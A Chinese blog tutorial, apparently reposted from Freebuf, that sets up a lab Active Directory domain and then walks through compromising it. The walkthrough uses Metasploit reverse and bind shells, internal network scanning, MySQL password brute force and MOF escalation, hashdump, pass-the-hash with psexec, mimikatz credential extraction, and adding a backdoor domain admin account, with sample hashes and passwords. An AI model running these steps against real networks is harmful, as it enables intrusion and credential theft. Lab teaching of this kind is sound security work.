内网渗透-完整的域渗透

内网渗透-完整的域渗透文章目录域环境概念创建域创建组 amp 用户加入域域渗透常规信息收集内网信息收集拿下 20031 MySQL 弱口令 2 哈希传递攻击拿下域控信息收集 mimikatz 后渗透 amp 其他 MSF 其他模块推荐阅读 域环境在开始域渗透之前 先来简单了解下域的一些概念概念域域 Domain 是一个有安全边界的计算机集合 安全边界的意思是 在两个域中 一个域中的用户无法访问另一个域中的资源 工作组的分散管理模式不适合大型的网络环境下工作 域模式就是针对大型的网络管理需求设计的 就是共享用户账号 计算机账号和


内网渗透-完整的域渗透

文章首发于Freebuf:https://www.freebuf.com/articles/network/306284.html

域环境

在开始域渗透之前,先来简单了解下域的一些概念

wfas-designexample1

概念

域(Domain)是一个有安全边界的计算机集合(安全边界的意思是,在两个域中,一个域中的用户无法访问另一个域中的资源)

工作组的分散管理模式不适合大型的网络环境下工作,域模式就是针对大型的网络管理需求设计的,就是共享用户账号,计算机账号和安全策略的计算机集合。域中集中存储用户账号的计算机就是域控器,域中用户账号,计算机账号和安全策略被存储在域控制器上一个名为Active Directory的数据库中

域控制器

域控制器(Domain Controller,DC)是域中的一台类似管理服务器的计算机,我们可以形象地将它理解为一个单位的门禁系统。域控制器负责所有连入的计算机和用户的验证工作。域内的计算机如果想互相访问,都要经过域控制器的审核

活动目录

活动目录(Active Directory,AD)是指域环境中提供目录服务的组件

目录用于存储有关网络对象(例如用户、组、计算机、共享资源、打印机和联系人等)的信息。目录服务是指帮助用户快速、准确地从目录中找到其所需要的信息的服务。活动目录实现了目录服务,为企业提供了网络环境的集中式管理机制

域控制器和活动目录的区别

如果网络规模较大,就要把网络中的众多对象,例如计算机、用户、用户组、打印机、共享文件等,分门别类、井然有序地放在一个大仓库中,并将检索信息整理好,以便查找、管理和使用这些对象(资源)。这个拥有层次结构的数据库,就是活动目录数据库,简称AD 库

要实现域环境,其实就是要安装AD。如果内网中的一台计算机上安装了AD,它就变成了DC(用于存储活动目录数据库的计算机)

也就是说安装了AD的计算机就是DC

安全域的划分

划分安全域的目的是将一组安全等级相同的计算机划入同一个网段。这个网段内的计算机拥有相同的网络边界,并在网络边界上通过部署防火墙来实现对其他安全域的网络访问控制策略(NACL)

一个典型的中小型内网的安全域划分,如下图所示,一个虚线框表示一个安全域(也是网络的边界,一般分为DMZ 和内网),通过硬件防火墙的不同端口实现隔离

image-20211127101944561

域内成员划分

  • 域控制器:域控制器用于管理所有的网络访问,包括登录服务器、访问共享目录和资源。域控制器中存储了域内所有的账户和策略信息,包括安全策略、用户身份验证信息和账户信息,一个网络中可以有多台域控
  • 成员服务器:成员服务器是指安装了服务器操作系统并加入了域、但没有安装活动目录的计算机,其主要任务是提供网络资源
  • 客户机:域中的计算机可以是安装了其他操作系统的计算机,用户利用这些计算机和域中的账户就可以登录域
  • 独立服务器:独立服务器和域没有关系。如果服务器既不加入域,也不安装活动目录,就称其为独立服务器。独立服务器可以创建工作组、与网络中的其他计算机共享资源,但不能使用活动目录提供的任何服务

参考:内网安全攻防:渗透测试实战指南

创建域

现有3个Win Server虚拟机,两个2008,一个2003

image-20211127112207736

使用winserver2008-1作为域控,接下来的操作在这台虚拟机上完成

操作步骤

  • 目标林根级域为:ocean.com
  • 域NetBIOS名称为:OCEAN0

创建组&用户

配置完毕重启后,进入用户和计算机image-20211127114049901

新建组织单位

image-20211127114116331

名为:oceantest

image-20211127114402025

一共有两台成员服务器,所以新建两个用户分别为

  • server2003
  • server20082

image-20211127114553028

密码就是拓扑中给出的

image-20211127114856606

加入域

保证三个虚拟机可以联通(我使用的网络模式是Lan网段10.10.10.1),静态IP并且设置了dns ip为10.10.10.2

image-20211127115810511

image-20211127115908953

进入winserver2008-2,右击计算机选择属性,修改计算机名

image-20211127115239574

点击确认后输入账号和密码,正确的话会提示,然后重启虚拟机

image-20211127115404118

在域控中可以看到两个computer

image-20211127124910998

成员服务器winserver2003可以使用域身份登录主机

image-20211127125145903

image-20211127125103673

默认可以使用主域的账户密码登录所有成员服务器

域渗透

这是整个域环境的拓扑图

image-20211127130540082

分析这个拓扑图可以得知

  • 成员服务器Winserver 2008-2具有双网卡,与攻击者在同一网段(192)可以直接访问,在现实中就是公网IP
  • 成员服务器Winserver 2008-2、成员服务器:Win Server2003、域控制器:Win Server2008-1在同一内网(10段),也在同一个域内,可以相互访问

因为是内网渗透,所以环境中成员服务器Winserver 2008-2已经因为漏洞使用MSF拿下了

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.179.128
set lport 12345
exploit

image-20211127131249733

常规信息收集

主机信息收集

# 获取当前用户
meterpreter > getuid
# 尽可能提权
meterpreter > getprivs
# 通过各种攻击向量来提权
meterpreter > getsystem
。。。。。。

成功拿到system权限

image-20211127131538741

# 查看网卡信息
meterpreter >ifconfig	发现有两个网卡,其中包含10(内网)网段
# 查看路由信息
meterpreter >run autoroute -p
meterpreter >run get_local_subnets

image-20211127132712197

内网信息收集

# 通过ping命令
meterpreter >run post/multi/gather/ping_sweep RHOSTS=10.10.10.0/24
# 通过arp协议
meterpreter >run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24
# 使用info查看模块信息
meterpreter >meterpreter >info post/multi/gather/ping_sweep

image-20211127132544998

发现内网主机:10.10.10.2、10.10.10.4

在meterpreter中输入命令 shell 进入 成员服务器Winserver 2008-2 的命令行,使用命令查看网络详细情况

meterpreter > shell
C:\Windows\system32>ipconfig /all

image-20211127133035687

image-20211127133025974

通过这些信息可以判断 成员服务器Winserver 2008-2 在 ocean.com 域中,根据 DNS 信息判断域控主机 IP 为 10.10.10.2

设置路由使用 Nmap 对内网主机进行扫描

meterpreter > background 
msf5 exploit(multi/handler) > route add 10.10.10.3 255.255.255.0 1
# 将被控机成员服务器Winserver 2008-2的IP添加到 MSF 中,这是给kali增加的路由,添加之后kali才才能找到内网主机
msf5 exploit(multi/handler) > use scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.4
# 扫描域内的成员服务器 winserver2003
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.2
# 扫描域控服务器的端口

注:如果扫不到就重启下虚拟机

image-20211127140721854

image-20211127140725732

发现域内的成员服务器 winserver2003(10.10.10.4) 开放了3306 MySQL端口,使用msf查看是否存在漏洞

拿下2003

1.MySQL弱口令

扫描MySQL是否使用了弱口令

use auxiliary/scanner/mysql/mysql_login 
msf5 auxiliary(scanner/mysql/mysql_login) > show options
msf5 auxiliary(scanner/mysql/mysql_login) > set rhosts 10.10.10.4
msf5 auxiliary(scanner/mysql/mysql_login) > set username root
msf5 auxiliary(scanner/mysql/mysql_login) > set pass_file /root/桌面/top1000.txt
exploit

如果爆破成功后可以使用msf模块提权

[+] 10.10.10.4:3306        - 10.10.1.3:3306 - Success: 'root:123456

use windows/mysql/mysql_mof

msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456
PASSWORD => 123456
msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf exploit(windows/mysql/mysql_mof) > set USERNAME root
USERNAME => root
msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/mysql/mysql_mof) > exploit

通过MySQL的mof提权得到成员服务器 winserver2003(10.10.10.4) 的权限

2.哈希传递攻击

通过扫描端口可以判断其开启了445端口使用哈希传递攻击去打成员服务器 winserver2003(10.10.10.4)

PTH即pass-the-hash,原理是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不需要提供明文密码

使用MSF获取hash值

meterpreter > hashdump 
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
............

选择payload,使用winserver2008-2的账户密码hash,攻击winserver2003,因为内网环境中存在大量密码一样的主机,还有一些弱口令,当我们获得了一台的hash后,可以通过该hash进行横向渗透

hash解密网站:https://www.objecif-securite.ch/ophcrack

后半段为加密数据

image-20211126205647944

background
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
show options                      -->查看配置选项
set RHOST 10.10.10.4	         -->设置攻击目标IP,端口默认445
set SMBUser Administrator         -->设置账号为wing
set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
run

问题解决

hashdump报错:[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

进程权限不足,ps之后migrate explorer.exe

meterpreter > migrate 3416
[*] Migrating from 1820 to 3416...
[*] Migration completed successfully.
meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3GvSevN4pTrQrBY9PhEwozRPh5uPsL8jUZ:::

还有就是要注意使用虚拟机向外复制时,在确认一边可能出现hash对完全就不对的情况

攻击得到域内机器2003的session

image-20211127172134463

当然不止这些攻击手段

image-20211127172932169

目前域内的两台成员服务器已经被拿下,最后就是域控服务器

拿下域控

信息收集

# 显示一个计算机上共享资源的列表
net view 
net view /domain

# 获取所有域的用户列表
net user /domain

# 获取域用户组信息
net group /domain

# 获取当前域管理员信息
net group "domain admins" /domain

# 查看域时间及域服务器的名字
net time /domain

# 添加普通域用户,这个要域管理权限才可以的
net user hack hack /add /domain

# 将普通域用户提升为域管理员
net group "Domain Admins" hack /add /domain

image-20211127174319398

通过信息收集可以判断出

\\WIN-A9PLNLID2QM.ocean.com IP:10.10.10.2 就是域控

继续收集hash账号信息

meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:3GvSevN4pTrQrBY9PhEwozRPh5uPsL8jUZ:::
ASPNET:1006:b6cdaa6dd10a6155b54d6886c7b4b8f4:570c90ed6cca2f86b06241a2e5e0c3df:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WWW-C4D593E2D2C:1000:44566b28c2e9a8f2d6aba8863bf7093c:2d8b5c5e471954a4ff306dff1b311cc6:::
IWAM_WWW-C4D593E2D2C:1001:80e1bd999815342156825c6c4818ef78:7c7ee5557864c448aba74604255eeac2:::
ocean:1009:a8515a6b1cd41f3eaad3b435b51404ee:8c463fff186fe69a245b37b195c49c1d:::
SUPPORT_388945a0:1004:aad3b435b51404eeaad3b435b51404ee:eb84cedb36588cbaf2bf1b9a64905ce5:::
# 注意这里从虚拟机里直接复制出来的是错误的

image-20211127174601108

普通用户更改系统信息都需要通过域管理员的操作,要输入账号和密码

mimikatz

可以使用mimikatz获取明文的密码

使用 mimikatz 模块需要 System 权限,所以我们在使用该模块之前需要将当前 MSF 中的 shell 提升为 system

# 加载kiwi模块
load mimikatz
# 查看kiwi模块的使用
help mimikatz

MSF 中 mimikatz 模块的使用

mimikatz 下有七个命令:

  • kerberos:kerberos 相关的模块
  • livessp:尝试检索 livessp 凭据
  • mimikatz_command:运行一个定制的命令
  • msv:msv 凭证相关的模块,列出目标主机的用户密码哈希
  • ssp:ssp 凭证相关的模块
  • tspkg:tspkg 凭证相关的模块
  • wdigest:wdigest 凭证相关的模块

使用kerberos命令查看

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User             Password
------    -------    ------        ----             --------
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE  
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE    
0;53193   NTLM                                      
0;999     Negotiate  OCEAN0       SERVERS2003$     
0;390687  Kerberos   OCEAN0       administrator    Ocean@123

通过获取当前域管理员信息,确认administrator就是域控主机管理员用户

net group "domain admins" /domain

使用psexec模块拿到sessions

use exploit/windows/smb/psexec
set rhost 10.10.10.2
set SMBDomain ocean0
set SMBUser administrator
set SMBPASS Ocean@123
set payload windows/meterpreter/bind_tcp

image-20211128092839846

注:域控虚拟机要关闭域防火墙

执行后拿到域控主机的sessions

image-20211128093145369

整个攻击流程:

image-20211128093803079

后渗透&其他

拿到权限后要考虑收集重要信息、提权、维权、痕迹清理等操作

收集密码

meterpreter > hashdump
# 如果获取不到,可以使用
meterpreter > run post/windows/gather/hashdump

image-20211128095458312

远程连接

拿下域控之后,所有的主机都可以使用域控 administrator:Ocean@123 账户登录

redesktop 192.168.179.148
# 因为成员服务器有双网卡,并且能直接被攻击者访问,所以可以直接远程连接登录,其他主机因为在内网需要设置代理之后才可以访问

image-20211128101820635

注:虚拟机winserver2008-2需要开启RDP,且设置为任意连接

image-20211128102403375

登录之后可以再次使用RDP连接域控,账户就是域控账号

image-20211128102752539

层层套娃下成功连接域控

image-20211128103300178

MSF其他模块

MSF使用详解

另外在新版msf 6中mimikatz已经更名为kiwi,使用命令也稍有改变

推荐阅读:

pony686,这个老哥写了很多内网文章

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/227950.html原文链接:https://javaforall.net

(0)
上一篇 2026年3月16日 下午8:08
下一篇 2026年3月16日 下午8:09


相关推荐

  • python中读写LMDB数据库[通俗易懂]

    python中读写LMDB数据库[通俗易懂]转自原文:https://blog.csdn.net/dcrmg/article/details/79144507LMDB的全称是LightningMemory-MappedDatabase(快如闪电的内存映射数据库),它的文件结构简单,包含一个数据文件和一个锁文件:LMDB文件可以同时由多个进程打开,具有极高的数据存取速度,访问简单,不需要运行单独的数据库管理进程,只要在访问数据的代码…

    2026年4月17日
    6
  • 计算机保护插件无法安装,电脑无法安装ActiveX控件怎么办「建议收藏」

    计算机保护插件无法安装,电脑无法安装ActiveX控件怎么办「建议收藏」ActiveX控件是网站常用的一款网页辅助工具,有时候我们可能需要安装它,但是却发现浏览器阻止了它安装,那么你知道电脑无法安装ActiveX控件怎么办吗?下面是学习啦小编整理的一些关于电脑无法安装ActiveX控件的相关资料,供你参考。电脑无法安装ActiveX控件的解决方法:1、首先建议将相应网站加入可信站点。2、其次建议选中可信站点。自定义级别——找到“下载未签名的ActiveX控件”——选中…

    2022年5月14日
    99
  • OpenClaw养成记,我的第一只龙虾上岗打工了,能帮我审核gitcode账号了。

    OpenClaw养成记,我的第一只龙虾上岗打工了,能帮我审核gitcode账号了。

    2026年3月13日
    2
  • clion激活码一个月【中文破解版】

    (clion激活码一个月)2021最新分享一个能用的的激活码出来,希望能帮到需要激活的朋友。目前这个是能用的,但是用的人多了之后也会失效,会不定时更新的,大家持续关注此网站~https://javaforall.net/100143.htmlIntelliJ2021最新激活注册码,破解教程可免费永久激活,亲测有效,上面是详细链接哦~S3…

    2022年3月26日
    79
  • golang map转json

    golang map转json““//maptojsonpackagemainimport(“encoding/json”“fmt”)funcmain(){s:=[]map[string]interface{}{}m1:=map[string]interface{}{“name”:”John”,”age”:10}m2:=map[string]interface{}{“

    2022年6月20日
    35
  • 使用StretchBlt函数导致位图失真的解决方案

    使用StretchBlt函数导致位图失真的解决方案vc 中位图伸缩函数 StretchBlt 在对图片进行缩放时会造成严重的图片失真 在了解解决方法前先巩固下 StretchBlt 的用法 StretchBlt 函数功能 函数从源矩形中复制一个位图到目标矩形 必要时按目前目标设备设置的模式进行图像的拉伸或压缩 函数原型 BOOLStretchB HDChdc intnXOriginD intnYOriginD

    2026年3月16日
    2

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号